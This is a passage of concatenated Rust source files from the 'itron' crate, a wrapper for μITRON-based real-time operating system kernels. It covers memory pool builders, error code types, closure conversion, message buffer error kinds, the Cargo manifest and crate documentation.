impl<BlockSize, BlockCount> Builder<BlockSize, BlockCount> {
/// (**Mandatory**) Specify the block size.
#[inline]
pub fn block_size(self, value: usize) -> Builder<(), BlockCount> {
let (blksz, blksz_overflow) = match value.try_into() {
Ok(x) => (x, false),
Err(_) => (0, true),
};
Builder {
block_size: (),
block_count: self.block_count,
blksz_overflow,
blkcnt_overflow: self.blkcnt_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF { blksz, ..self.raw },
}
}
/// (**Mandatory**) Specify the capacity, measured in number of blocks.
#[inline]
pub fn block_count(self, value: usize) -> Builder<BlockSize, ()> {
let (blkcnt, blkcnt_overflow) = match value.try_into() {
Ok(x) => (x, false),
Err(_) => (0, true),
};
Builder {
block_size: self.block_size,
block_count: (),
blksz_overflow: self.blksz_overflow,
blkcnt_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF { blkcnt, ..self.raw },
}
}
/// Specify the queue order. Defaults to `Fifo` when unspecified.
#[inline]
pub fn queue_order(self, value: QueueOrder) -> Self {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF {
mpfatr: value.as_raw_atr(),
..self.raw
},
..self
}
}
}
impl Builder<(), ()> {
/// Create a memory pool using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<MemoryPool, Error<BuildError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
if self.blksz_overflow || self.blkcnt_overflow {
// Safety: `E_NOMEM` is handled by `BuildError`
// (Warning: This is not true for `cfg(feature = "none")`.)
return Err(Error::new_unchecked(ErrorCode::new_unchecked(abi::E_NOMEM)));
}
let id = Error::err_if_negative(abi::acre_mpf(&self.raw))?;
// Safety: We own the memory pool we create
Ok(MemoryPool::from_raw_nonnull(abi::NonNullID::new_unchecked(
id,
)))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// An owned memory pool.
///
/// [Deletes] the memory pool automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: MemoryPoolRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct MemoryPool(MemoryPoolRef<'static>);
impl fmt::Debug for MemoryPool {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for MemoryPool {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl MemoryPool {
/// Construct a `MemoryPool` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { MemoryPoolRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `MemoryPoolRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> MemoryPoolRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `MemoryPool` as [`MemoryPoolRef`].
///
/// Use this to perform operations on memory pools because most of the
/// methods are implemented on `MemoryPoolRef` but not `MemoryPool`.
#[inline]
pub const fn as_ref(&self) -> MemoryPoolRef<'_> {
self.0
}
}
}
<file_sep>/src/error.rs
//! Error types.
//!
//! Errors indicate exceptional outcomes of system calls. Like most
//! traditional operating systems, they are represented by error codes in
//! μITRON.
//!
//! # Error Kind Types
//!
//! TODO: describe error kind types
//!
//! # Critical Errors
//!
//! The following errors may be escalated to panics or undefined behaviors:
//!
//! - Kernel integrity errors (some cases of `E_SYS` in the TOPPERS
//! kernels).
//!
//! - Memory access permission errors (`E_MACV`) caused by pointers that are
//! supposed to be accessible by the current thread (e.g., pointers referring
//! to local variables).
//!
//! - `E_PAR` caused by invalid timeout values.
//!
use core::{fmt, marker::PhantomData};
#[allow(unused_imports)]
use crate::abi;
/// Target-specific error value that can be categorized as one of the error
/// kinds represented by `Kind`.
#[derive(Clone, Copy, PartialEq, Eq)]
pub struct Error<Kind = ()> {
code: ErrorCode,
_phantom: PhantomData<Kind>,
}
/// Trait for [error kind types].
///
/// [error kind types]: super#error-kind-types
pub trait ErrorKind: Copy {
/// Categorize the specified error code.
///
/// Returns `None` if the error code is invalid in this context.
fn from_error_code(code: ErrorCode) -> Option<Self>;
}
impl<Kind: ErrorKind> Error<Kind> {
/// Construct `Error`.
///
/// # Safety
///
/// `Kind::from_error_code(code)` must return `Some(_)`. Otherwise,
/// [`Self::kind`] will cause an undefined behavior.
#[inline]
pub unsafe fn new_unchecked(code: ErrorCode) -> Self {
debug_assert!(Kind::from_error_code(code).is_some());
Self {
code,
_phantom: PhantomData,
}
}
/// Return `Ok(code)` if `code >= 0`; `Err(new_unchecked(code))` otherwise.
///
/// # Safety
///
/// See [`Self::new_unchecked`].
#[inline]
pub(crate) unsafe fn err_if_negative(code: abi::ER) -> Result<abi::ER, Self> {
if let Some(e) = ErrorCode::new(code) {
// Safety: Upheld by the caller
Err(unsafe { Self::new_unchecked(e) })
} else {
Ok(code)
}
}
/// Get the error kind.
#[inline]
pub fn kind(self) -> Kind {
// Safety: Upheld by `new_unchecked`'s caller
unsafe {
Kind::from_error_code(self.code).unwrap_or_else(|| core::hint::unreachable_unchecked())
}
}
/// Get the error code.
#[inline]
pub fn code(self) -> ErrorCode {
self.code
}
}
impl<Kind> fmt::Debug for Error<Kind> {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
fmt::Debug::fmt(&self.code, f)
}
}
/// Raw error code.
#[derive(Clone, Copy, PartialEq, Eq)]
pub struct ErrorCode(abi::NonZeroER);
impl ErrorCode {
/// Construct an `ErrorCode`.
///
/// Returns `None` if the specified value is not negative.
#[inline]
pub const fn new(code: abi::ER) -> Option<Self> {
if code >= 0 {
None
} else if let Some(x) = abi::NonZeroER::new(code) {
Some(Self(x))
} else {
None
}
}
/// Construct an `ErrorCode` without checking if `code` is a valid error
/// code.
//
/// # Safety
///
/// If `code` is not negative, this function causes an undefined
/// behavior.
#[inline]
pub const unsafe fn new_unchecked(code: abi::ER) -> Self {
Self(unsafe { abi::NonZeroER::new_unchecked(code) })
}
/// Get the numerical value.
#[inline]
pub const fn get(self) -> abi::ER {
self.0.get()
}
}
impl fmt::Debug for ErrorCode {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let name = match () {
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
() => match self.get() {
abi::E_SYS => Some("E_SYS"),
abi::E_NOSPT => Some("E_NOSPT"),
abi::E_RSFN => Some("E_RSFN"),
abi::E_RSATR => Some("E_RSATR"),
abi::E_PAR => Some("E_PAR"),
abi::E_ID => Some("E_ID"),
abi::E_CTX => Some("E_CTX"),
abi::E_MACV => Some("E_MACV"),
abi::E_OACV => Some("E_OACV"),
abi::E_ILUSE => Some("E_ILUSE"),
abi::E_NOMEM => Some("E_NOMEM"),
abi::E_NOID => Some("E_NOID"),
abi::E_NORES => Some("E_NORES"),
abi::E_OBJ => Some("E_OBJ"),
abi::E_NOEXS => Some("E_NOEXS"),
abi::E_QOVR => Some("E_QOVR"),
abi::E_RLWAI => Some("E_RLWAI"),
abi::E_TMOUT => Some("E_TMOUT"),
abi::E_DLT => Some("E_DLT"),
abi::E_CLS => Some("E_CLS"),
abi::E_RASTER => Some("E_RASTER"),
abi::E_WBLK => Some("E_WBLK"),
abi::E_BOVR => Some("E_BOVR"),
abi::E_COMM => Some("E_COMM"),
_ => None,
},
#[cfg(feature = "none")]
() => None,
};
if let Some(name) = name {
f.write_str(name)
} else {
write!(f, "{}", self.get())
}
}
}
impl<Kind: ErrorKind> From<Error<Kind>> for ErrorCode {
#[inline]
fn from(x: Error<Kind>) -> Self {
x.code()
}
}
/// Placeholder for error kind variants.
///
/// **Do not refer to this type in your code!**
/// This type exists purely for documentation purposes. This type is replaced
/// with the inhabited type [`Kind`] if the variant is valid for the current
/// target kernel or the uninhabited type [`Never`] otherwise. This technique
/// lets us match against error kinds that do not exist in some kernels without
/// causing a compilation error.
///
/// ```
/// #![feature(exhaustive_patterns)]
/// use itron::error::{Kind, Never};
///
/// enum ExampleError {
/// Error1(Kind),
/// Error2(Never),
/// // displayed as the following in the doc
/// // Error1(MaybeKind),
/// // Error2(MaybeKind),
/// }
///
/// # fn a(error: ExampleError) {
/// // Portable code that handles all kinds
/// match error {
/// // `_` = don't care; the arm is just ignored if the
/// // error kind does not exist in this kernel
/// ExampleError::Error1(_) => println!("error1"),
/// ExampleError::Error2(_) => println!("error2"),
/// }
///
/// // Portable code that handles some kinds
/// match error {
/// ExampleError::Error2(_) => println!("error2"),
/// _ => println!("other"),
/// }
///
/// // Non-portable code that handles all kinds
/// match error {
/// // `Kind(_)` = assume that the error kind exists;
/// // raise a compile error if this assumption is broken
/// ExampleError::Error1(Kind(_)) => println!("error1"),
///
/// // (no arm) = assume that the error kind does not exist;
/// // raise a compile error if this assumption is broken
/// // (This requires `#[feature(exhaustive_patterns)]` for now.)
/// }
/// # }
/// ```
pub type MaybeKind = ();
/// Type for error kinds that are valid in the current target kernel.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct Kind(pub __Unstable);
impl Kind {
#[inline]
pub(crate) fn from_error_code(_: ErrorCode) -> Self {
Self(__Unstable)
}
}
/// I haven't decided what to put in [`Kind`].
#[doc(hidden)]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct __Unstable;
/// Indicates that the error kind never occurs in the current target kernel.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Never {}
/// An internal macro to define error kind types.
macro_rules! define_error_kind {
(
$( #[$meta:meta] )*
pub enum $name:ident {
$(
$( #[doc = $doc:literal] )*
#[cfg( $($cfg:tt)* )]
$variant:ident
),*
$(,)*
}
) => {
$( #[$meta] )*
///
/// This type is an [error kind type].
///
/// [error kind type]: crate::error#error-kind-types
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum $name {
$(
$( #[doc = $doc] )*
#[doc = ""]
// TODO: Replace this doc comment with `doc(cfg(...))`, which
// currently does not work
#[doc = concat!("<i>Requires</i>: `cfg(", stringify!($($cfg)*), ")`")]
#[cfg(doc)]
$variant(crate::error::MaybeKind),
#[cfg(all(not(doc), $($cfg)* ))]
$variant(crate::error::Kind),
#[cfg(all(not(doc), not( $($cfg)* )))]
$variant(crate::error::Never),
)*
}
};
}
<file_sep>/Cargo.toml
[package]
name = "itron"
version = "0.1.9"
license = "0BSD"
edition = "2018"
readme = "src/lib.md"
description = "Interface to operating systems based on μITRON and its derivatives."
categories = ["embedded", "no-std", "external-ffi-bindings", "os"]
repository = "https://github.com/solid-rs/itron-rs"
keywords = ["rtos", "toppers", "kernel"]
[features]
default = []
nightly = ["doc_cfg"]
doc_cfg = []
unstable = ["tt-call"]
# --------------------------------------------------------
# Kernel selection
# - Be sure to synchronize this with `build.rs`.
# - Be sure to synchronize this with the "list of enabled features"
# in `crate::abi`.
none = ["dcre", "rstr_task", "messagebuf", "ovrhdr", "subprio",
"pi_mutex", "systim_local", "exd_tsk"]
asp3 = []
solid_asp3 = []
fmp3 = []
solid_fmp3 = []
# --------------------------------------------------------
# Kernel customization
# - Be sure to synchronize this with the "list of enabled features"
# in `crate::abi`.
# Dynamic object creation. Enables owned wrapped types.
dcre = []
# "Restricted" tasks
rstr_task = []
# Message buffers
messagebuf = []
# Overrun handlers
ovrhdr = []
# Subpriorities
subprio = []
# Priority-inheritance mutex
pi_mutex = []
# Processor-local kernel ticks
systim_local = []
# `exd_tsk`
exd_tsk = []
[dependencies]
tt-call = { version = "1.0.8", optional = true }
[dev-dependencies]
compiletest = { version = "0.7", package = "compiletest_rs" }
[package.metadata.docs.rs]
# choose `none` to maximize the wrapper generation.
features = ["doc_cfg", "nightly", "unstable", "none"]
# only build the default target
targets = []
<file_sep>/src/abi/mod.rs
//! C API
//!
//! Note: `doc(cfg(...))` is not used in this module as different kernels might
//! provide different items with conflicting names. This module's documentation
//! might not be useful unless you ran `cargo doc` with an appropriate kernel
//! selection.
//!
//! <i>This documentation has been built with the following Cargo features:
// Make sure the commas are inserted at the right places!
#![cfg_attr(feature = "asp3", doc = "`asp3`")]
#![cfg_attr(feature = "fmp3", doc = "`fmp3`")]
#![cfg_attr(feature = "solid_asp3", doc = "`solid_asp3`")]
#![cfg_attr(feature = "solid_fmp3", doc = "`solid_fmp3`")]
#![cfg_attr(feature = "none", doc = "`none`")]
#![cfg_attr(feature = "dcre", doc = ", `dcre`")]
#![cfg_attr(feature = "rstr_task", doc = ", `rstr_task`")]
#![cfg_attr(feature = "messagebuf", doc = ", `messagebuf`")]
#![cfg_attr(feature = "ovrhdr", doc = ", `ovrhdr`")]
#![cfg_attr(feature = "subprio", doc = ", `subprio`")]
#![cfg_attr(feature = "pi_mutex", doc = ", `pi_mutex`")]
#![cfg_attr(feature = "systim_local", doc = ", `systim_local`")]
#![cfg_attr(feature = "exd_tsk", doc = ", `exd_tsk`")]
//! </i>
#![allow(non_camel_case_types)]
#![allow(unused_imports)]
mod error;
mod intr;
mod mempool;
mod sync;
mod system;
mod task;
mod time;
mod types;
pub use self::{error::*, intr::*, mempool::*, sync::*, system::*, task::*, time::*, types::*};
<file_sep>/src/lib.md
Rust interface to interact with operating systems based on μITRON and its derivatives.
## Kernel Selection
This crate exposes a Cargo feature for each supported RTOS kernel
implementation. The following ones are supported:
- `asp3`: [TOPPERS/ASP3](https://toppers.jp/asp3-kernel.html)
- Additional features supported: `dcre` (dynamic object creation), `rstr_task` (restricted tasks), `messagebuf` (message buffers), `ovrhdr` (overrun handlers), `subprio` (task subpriorities)
- `solid_asp3`: TOPPERS/ASP3 with [SOLID] extensions
- Additional features supported: `dcre` (dynamic object creation), `messagebuf` (message buffers), `pi_mutex` (priority inheritance), `exd_tsk` (exit and delete the calling task)
- `fmp3`: [TOPPERS/FMP3](https://toppers.jp/fmp3-kernel.html)
- Additional features supported: `systim_local` (processor-local kernel ticks)
- `solid_fmp3`: TOPPERS/FMP3 with [SOLID] extensions
- Additional features supported: `dcre` (dynamic object creation), `systim_local` (processor-local kernel ticks), `exd_tsk` (exit and delete the calling task)
- `none` (default): Stub implementation that exposes all functions but always panics
It's an error to enable more than one of these features. It's unsafe to specify an incorrect kernel because the ABIs differ between kernels. This crate assumes it's inherently safe to call the specified kernel's API functions (provided the usage is correct). Specifying unsupported features for a given kernel might result in a compiler or linker error¹.
Items are `cfg`-gated according to the selected kernel's supported feature set so that the uses of non-existent features are detected at compile time.
<sub>
¹ TOPPERS kernels' extensions are mutually exclusive, but building the crate documentation should still succeed even if all of them are specified.
</sub>
[SOLID]: https://solid.kmckk.com/SOLID/
## Cargo Features
In addition to the kernel selection features described above, this package
supports the following Cargo features:
- `nightly` enables nightly-only features. Currently, this feature enables the use of [`doc_cfg`] and exposes `itron::time::timeout!`.
- `unstable` enables unstable (in terms of API stability), experimental features that may be changed or removed in the future.
[`doc_cfg`]: https://doc.rust-lang.org/unstable-book/language-features/doc-cfg.html
## API Design
*This section is relevant only when the `unstable` feature is enabled.*
### Object ID Wrappers
Kernel object IDs are encapsulated in opaque wrappers, which can be constructed either by calling the creation methods or by converting from raw object IDs. Although interacting with arbitrary kernel objects do not exhibit memory unsafety by itself, conversion from raw object IDs has to go through `unsafe` calls because the created wrappers could be used to interfere with other code's usage of such objects, breaking its assumptions, possibly violating memory safety. Deleting unowned objects is `unsafe` as well because such objects could be still in use by their actual owners, and the actual owners would touch supposedly-unrelated objects if the IDs were reused. This system, which we call *external object safety*, is related to I/O safety from [a Rust RFC](https://github.com/rust-lang/rfcs/pull/3128) being proposed at the point of writing.
It's allowed to [get] an object ID wrapper for the current task of the current processor. However, the wrapper created in this way must not outlive the originating task.
[get]: crate::task::current
### Kernel Assumed to be Operational
**It's assumed that this crate's functions are called while the kernel is operational** (i.e., `sns_ker` returns `FALSE`). It's up to application programmers to make sure they are not called inside initialization or termination routines.
### Restricted Tasks
If restricted tasks are not enabled by the `rstr_task` feature, **the caller is assumed to be a non-restricted task.** When called from a restricted task, blocking functions can return `E_NOSPT` , which is not handled and will cause a UB if the `rstr_task` feature is not enabled.
<file_sep>/src/closure.rs
//! Closures: `(fn(EXINF), EXINF)`
use crate::abi;
use core::mem::MaybeUninit;
/// A bundle of a function pointer and associated data.
///
/// # Safety
///
/// When calling the function pointer, the second value must be provided as
/// the parameter.
///
/// If the original closure was `!Send`, it can only be called from the creator
/// thread.
pub type Closure = (unsafe extern "C" fn(abi::EXINF), abi::EXINF);
/// Conversion to [`Closure`].
pub trait IntoClosure {
/// Convert `self` to `Closure`.
fn into_closure(self) -> Closure;
}
/// Trivial conversion.
impl IntoClosure for (extern "C" fn(abi::EXINF), abi::EXINF) {
#[inline]
fn into_closure(self) -> Closure {
(self.0, self.1)
}
}
/// # Example
///
/// ```
/// use itron::closure::IntoClosure;
/// let (fp, data) = (|| dbg!()).into_closure();
/// unsafe { fp(data) };
///
/// let captured_value = 42u16;
/// let (fp, data) = (move || { assert_eq!(captured_value, 42); }).into_closure();
/// unsafe { fp(data) };
///
/// let captured_value = &"hello";
/// let (fp, data) = (move || { assert_eq!(*captured_value, "hello"); }).into_closure();
/// unsafe { fp(data) };
/// ```
///
/// The source type must fit in [`abi::EXINF`]:
///
/// ```compile_fail
/// # use itron::closure::IntoClosure;
/// let captured_value = [0usize; 2]; // too large!
/// let _ = (move || { dbg!(captured_value); }).into_closure();
/// ```
///
/// The source type must not contain a reference to a local variable:
///
/// ```compile_fail
/// # use itron::closure::IntoClosure;
/// let captured_value = 42usize;
/// let _ = (|| { dbg!(&captured_value); }).into_closure(); // capturing by reference
/// ```
impl<T: Fn() + Copy + 'static> IntoClosure for T {
#[inline]
fn into_closure(self) -> Closure {
// Make sure `T` fits
trait AssertSize {
const X: ();
}
impl<T> AssertSize for T {
const X: () = if core::mem::size_of::<T>() > core::mem::size_of::<abi::EXINF>() {
let zero = 0;
// compile-time panicking is not stable yet
#[allow(unconditional_panic)]
#[allow(non_snake_case)]
let __T_is_too_large_to_fit_in_EXINF__ = 1 / zero;
#[allow(clippy::empty_loop)]
loop {}
};
}
let () = <T as AssertSize>::X;
extern "C" fn trampoline<T: Fn() + Copy + 'static>(x: abi::EXINF) {
// Safety: `x` is a reinterpretation of the original `T`. This
// function reconstitutes `T` every time it's called, but
// this is safe because `T: Copy`.
let t: T = unsafe { core::mem::transmute_copy(&x) };
t();
}
// Makes sure the transmutation source type is large enough to
// cover `EXINF` as required by `transmute_copy`.
#[repr(C)]
struct PadWithZero<T> {
x: MaybeUninit<T>,
zero: MaybeUninit<abi::EXINF>,
}
(trampoline::<T>, unsafe {
core::mem::transmute_copy(&PadWithZero {
x: MaybeUninit::new(self),
zero: MaybeUninit::uninit(),
})
})
}
}
<file_sep>/src/messagebuffer.rs
//! Message buffers
use core::{convert::TryInto, fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
/// Error type for [`MessageBufferRef::send`].
pub enum SendError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
/// The message is too large (`E_PAR`, NGKI3364).
#[cfg(not(feature = "none"))]
BadParam,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for SendError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::send_timeout`].
pub enum SendTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
/// The message is too large (`E_PAR`, NGKI3364).
#[cfg(not(feature = "none"))]
BadParam,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for SendTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_PAR` for invalid timeout is considered critial
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::try_send`].
pub enum TrySendError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The message is too large (`E_PAR`, NGKI3364).
#[cfg(not(feature = "none"))]
BadParam,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for TrySendError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::recv`].
pub enum RecvError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for RecvError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::recv_timeout`].
pub enum RecvTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for RecvTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::try_recv`].
pub enum TryRecvError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for TryRecvError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::initialize`].
pub enum InitializeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InitializeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBuffer::build`].
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
#[cfg_attr(feature = "doc_cfg", doc(cfg(all(feature = "dcre", not(feature = "asp3")))))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
#[cfg(any())]
NotSupported,
/// Ran out of memory or message buffer IDs, or the specified block size
/// or capacity does not fit in `uint_t`.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
